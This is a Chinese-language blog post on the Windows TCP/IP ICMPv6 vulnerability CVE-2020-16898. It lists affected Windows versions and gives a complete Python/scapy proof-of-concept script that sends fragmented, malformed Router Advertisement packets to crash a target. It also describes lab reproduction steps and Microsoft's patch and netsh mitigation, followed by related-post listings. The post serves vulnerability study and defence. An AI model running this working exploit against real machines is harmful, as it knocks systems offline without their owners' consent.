Microsoft Windows TCPIP 远程代码执行漏洞

最新推荐文章于 2022-10-31 17:41:07 发布
最新推荐文章于 2022-10-31 17:41:07 发布
阅读量1.4k 收藏 4
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36197704/article/details/109179851
版权

1.漏洞编号

CNNVD编号:CNNVD-202010-528

CVE编号:CVE-2020-16898

2.漏洞描述:

       Windows TCP/IP堆栈不正确地处理ICMPv6 Router Advertisement数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。要利用此漏洞,攻击者必须将经过特殊设计的ICMPv6 Router Advertisement数据包发送到远程Windows计算机上。

3.影响版本

Microsoft Windows 10 1709版本

Windows 10 1803版本

Windows 10 1809版本

Windows 10 1903版本

Windows 10 1909版本

Windows 10 2004版本

Windows Server 2019版本

Windows Server 1903版本

Windows Server 1909版本

Windows Server 2004版本

4.POC脚本

#!/usr/bin/env python3
#
# Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
#
# Author: Adam 'pi3' Zabrocki
# http://pi3.com.pl
#

from scapy.all import *
from scapy.layers.inet6 import ICMPv6NDOptEFA, ICMPv6NDOptRDNSS, ICMPv6ND_RA, IPv6, IPv6ExtHdrFragment, fragment6

v6_dst = "fd15:4ba5:5a2b:1008:79f7:5f20:fe8:2995"
v6_src = "fe80::559e:21a8:dc54:bf1b%12"

p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4

c = ICMPv6NDOptEFA();

e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
      Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
              IPv6ExtHdrFragment()/pkt

l=fragment6(p_test_frag, 200)

for p in l:
    send(p)

5.漏洞复现

PS:攻击机器和受害机器能正常进行IPv6通信,需开启IPv6入站规则

1)网络环境开启ipv6支持。这里使用vmware,NAT出一个子网,并开启ipv6支持

2)在vmware中搭建受影响的Win10 1909 32位系统

3)ipconfig命令,受害机器选择IPv6地址

4)攻击机器选择本地链接的IPv6地址

5)执行poc脚本,受害机器成功被打蓝屏

6.修复建议

Microsoft官方公告信息给出详细修复建议,如下:

应用Microsoft官方公告中的补丁:

https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2020-16898

Microsoft官方提供的临时修复措施:

禁用ICMPv6 RDNSS。

使用以下PowerShell命令禁用ICMPv6 RDNSS,以阻止攻击者利用漏洞。此解决方法仅适用于Windows 1709及更高版本。

netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable

注意:进行更改后,无需重启。

使用下面的PowerShell命令禁用该解决方法。

netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=enable

注意:禁用后,无需重启。

 

chaojixiaojingang
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2020-16898 —— Windows TCP/IP远程执行代码漏洞
战神/calmness的博客
12-09 227
CVE-2020-16898 | Windows TCP/IP远程执行代码漏洞 发布时间:2020年10月13日MITER CVE-2020-16898 1、描述 Windows TCP / IP堆栈不正确地处理ICMPv6路由器播发数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。 要利用此漏洞,攻击者必须将特制的ICMPv6路由器广告数据包发送到远程Windows计算机。 2、环境 3、过程 4、修复建议 ...
远程exp_Windows TCP/IP远程代码执行漏洞(CVE202016898)
weixin_36397104的博客
01-14 477
漏洞信息CVE编号:CVE-2020-16898漏洞名称:Windows TCP/IP远程代码执行漏洞漏洞描述:当Windows TCP/IP堆栈不正确地处理递归DNS服务器选项,且长度字段值为偶数的ICMPv6路由器广告数据包时,存在一个远程代码执行漏洞。服务器选项长度以8个字节为增量进行计数,长度为3的RDNSS选项总长度应为24个字节。该选项本身包含五个字段:IPv6递归DNS服务...
漏洞公告】CVE-2017-8543:Windows Search远程代码执行漏洞
Gamay的博客
06-14 8389
2017年6月13日,微软官方在例行补丁日发布编号为CVE-2017-8543的漏洞公告,当Windows搜索处理内存中的对象时,存在远程执行代码漏洞。成功利用此漏洞的攻击者可以控制受影响的系统。
phpmyadmin漏洞_雷神众测漏洞周报 2020.01.202020.02.02(9)
weixin_39644915的博客
12-05 98
声明以下内容,均摘自于互联网,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,雷神众测以及文章作者不承担任何责任。雷神众测拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明雷神众测允许,不得任意修改或增减此文章内容,不得以任何方式将其用于商业目的。目录1.MetInfo存在文件上传漏洞2. Micros...
远程ip_漏洞Microsoft Windows TCP/IP 远程执行代码漏洞威胁通告
weixin_29044713的博客
12-30 364
2020年10月14日,中测安华必达实验室技术团队依托监测平台第一时间发现微软公司(Microsoft)披露了Microsoft Windows TCP/IP 远程执行代码漏洞(CVE-2020-16898)。经分析,攻击者可利用该漏洞在部分Windows 10和Windows Server版本操作系统的主机上执行任意代码。技术团队初步预计,该漏洞影响范围非常广泛,并提醒用户及时采取消控...
TCPIP终端程序源代码 .zip_TCPIP_tcp_tcpip 代码_tcpip代码
09-14
标签中提到了"tcpip_代码",这表明源代码不仅涉及TCP,也包含IP协议的实现。我们可能看到如ARP(地址解析协议)用于将IP地址转换为物理MAC地址,或ICMP(因特网控制消息协议)用于网络诊断和错误报告的部分。 ...
DSP DM642 TCPIP代码.rar
09-02
【标题】"DSP DM642 TCPIP代码.rar"是一个与数字信号处理(DSP)相关的项目,其中包含了用于在TI的DM642 DSP上实现TCP/IP协议栈的源代码。这个压缩包包含了实现网络通信功能的关键组件,是学习和开发基于DM642 DSP...
AUDC812 的 tcpip代码 - 8019
09-02
标题 "AUDC812 的 tcpip代码 - 8019" 提供了一个关于嵌入式系统中TCP/IP协议栈实现的资源,主要用于AUDC812微控制器,结合8019网络接口芯片。描述指出,这个源代码来源于c51bbs论坛,提供了一个下载链接,表明这...
基于TCPIP协议实现上位机对UR机器人的远程控制.rar
01-11
在“基于TCP/IP协议实现上位机对UR机器人的远程控制.doc”文档中,可能会详细阐述如何编写上位机程序,包括具体的代码示例、UR机器人的API使用方法以及网络通信的最佳实践。这份文档对于理解如何将理论知识应用于...
uIP TCPIP协议栈代码及手册.zip
08-26
总之,"uIP TCPIP协议栈代码及手册.zip"这个压缩包为学习和使用uIP提供了宝贵的资料。通过阅读手册并研究源代码,开发者不仅可以掌握uIP的工作原理,还能提升在嵌入式系统中进行网络编程的能力。无论你是初学者还是...
CVE-2020-16898:CVE-2020-16898(坏邻居)Microsoft Windows TCPIP漏洞检测逻辑和规则
02-03
CVE-2020-16898:CVE-2020-16898(坏邻居)Microsoft Windows TCPIP漏洞检测逻辑和规则
Windows TCP/IP 远程代码执行漏洞 (CVE-2022-34718)环境搭建+复现
m0_60884805的博客
10-31 3010
微软上月发布的补丁包含一个可能执行代码的TCP/IP协议漏洞。IPSec是一种可以对指定类型ip流量筛选过滤,并加密验证的一种协议。通常在VPN或者增强其他协议密码安全性的部分条件下使用。在windows中 ,我们需要搭建一个域条件下,两台对对方所有流量都加密验证的环境。因为很多时候它并不是一种默认开启的协议。
Windows tcp ip远程代码执行漏洞(CVE-2020-16898)复现
weixin_47531489的博客
07-20 790
1 简介 CVE-2020-16898,又称“Bad Neighbor”。Windows TCP/IP堆栈不正确地处理ICMPv6 Router Advertisement数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。要利用此漏洞,攻击者必须将经过特殊设计的ICMPv6 Router Advertisement数据包发送到远程Windows计算机上。 2 漏洞概述 当 Windows TCP/IP 堆栈不正确地处理使用 Option Type
Windows TCP/IP协议驱动远程溢出漏洞(转)
cuankuangzhong6373的博客
06-09 331
受影响系统:   Microsoft Windows XP SP2   Microsoft Windows XP SP1   Microsoft Windows Server 2003 SP1   Microsoft Windo...
CVE-2020-16898 Windows tcp/ip远程代码执行漏洞复现以及分析
weixin_39811856的博客
10-27 909
受影响版本 Windows 10 Version 1709 for 32-bit Systems Windows 10 Version 1709 for ARM64-based Systems Windows 10 Version 1709 for x64-based Systems Windows 10 Version 1803 for 32-bit Systems Windows 10 Version 1803 for ARM64-based Systems Windows 10 Versi
CVE-2019-0708 Windows远程代码执行漏洞预警
煜铭2011
07-30 869
0x00 背景 2019 年 5 月 15 日微软发布安全补丁修复了 CVE 编号为 CVE-2019-0708 的 Windows 远程桌面服务(RDP) 远程代码执行漏洞,该漏洞在不需身份认证的情况下即可远程触发,危害与影响面极大。 Windows 远程桌面服务(RDP)主要用于管理人员对 Windows 服务器进行远程管理,使用量极大。近日微软官方披露 Windows 中的...
Cve-2020-16898 windows tcp/ip远程代码执行漏洞复现及分析
mukami0621的博客
10-19 2945
Cve-2020-16898 复现 参考:https://blog.csdn.net/hsj_csdn/article/details/109138162 1、复现过程: 1、准备靶机环境 下一个win10的镜像,然后开启vmware的IPV6功能(编辑-虚拟网络编辑器-NAT设置),查看靶机IPV6地址 2、攻击机运行脚本(攻击机需要能与靶机进行通信 3、攻击成功,靶机蓝屏重启 2、漏洞部分分析: 1、抓包,可以看到进行了多次DNS查询 2、分析poc找特征 通过对POC(来自github)的分析,找
Windows远程代码执行漏洞(CVE-2020-16898) 高危漏洞加固指南
乐大厨串串香飘万里
10-17 1531
序号漏洞类型风险等级漏洞主机( 操作系统及版本)1Windows TCP/IP远程代码执行漏洞(CVE-2020-16898)高Windows 漏洞详细当Windows TCP / IP堆栈不正确地处理使用选项类型25(递归DNS服务器选项)且长度字段值为偶数的ICMPv6路由器广告数据包时,存在一个远程执行代码漏洞。在此选项中,长度以8个字节为增量进行计数,因此长度为3的RDNSS选项的总长度应为24个字节。该选项本身包含五个字段:IPv6递归DNS服务器的类型,长度,保留,生存时间和地址。前四个
[CVE-2017-8464]Microsoft Windows远程命令执行漏洞复现
weixin_30237719的博客
06-16 267
版权声明:本文为博主的原创文章,未经博主同意不得转载 前言 记录下自己的复现,保留意见 2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,分别存在于LNK文件和Windows Search功能中。黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危 概述 微软的...
windows系统下代码执行漏洞
最新发布
07-25
根据引用\[1\],在受影响版本的Windows系统中存在绑定raw socket的应用程序时,TCPIP驱动程序在处理错误的ICMP包时存在内存漏洞,攻击者可以利用这个漏洞向目标计算机发送一个报头中包含一个碎片IP的ICMP数据包,从而导致Windows系统的tcpip.sys驱动崩溃或远程执行恶意代码。这个漏洞被命名为"微软多个Windows系统存在远程代码执行漏洞(ICMP协议)",漏洞类型为代码注入,发现时间为2023年3月15日。该漏洞的影响范围广泛。\[1\] 根据引用\[2\],微软官方已发布了升级补丁来修复这个漏洞。建议用户尽快升级程序,可以通过打开Windows Update并点击检查更新按钮来下载和安装相关的安全补丁。安装完毕后,需要重启服务器并检查系统运行情况。此外,还可以关停SMB服务或使用安全组公网入、内网入方向策略来禁止445、139端口的访问,以增加系统的安全性。\[2\] 根据引用\[3\],受影响的Windows系统版本包括Windows 10 v1903-1909 x64、Windows 10 Version 1903 for 32-bit Systems、Windows 10 Version 1903 for x64-based Systems、Windows 10 Version 1903 for ARM64-based Systems、Windows Server, Version 1903 (Server Core installation)、Windows 10 Version 1909 for 32-bit Systems、Windows 10 Version 1909 for x64-based Systems、Windows 10 Version 1909 for ARM64-based Systems、Windows Server, Version 1909 (Server Core installation)。\[3\] #### 引用[.reference_title] - *1* [微软多个 Windows 系统存在远程代码执行漏洞(ICMP协议)(MPS-2023-1376)](https://blog.csdn.net/murphysec/article/details/129559338)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [【操作系统安全漏洞 】解决CVE-2017-11780:Microsoft Windows SMB Server远程代码执行漏洞](https://blog.csdn.net/weixin_26767391/article/details/119620921)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [【漏洞复现】Windows SMB远程代码执行漏洞(CVE-2020-0796)](https://blog.csdn.net/qq_52549196/article/details/126485940)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值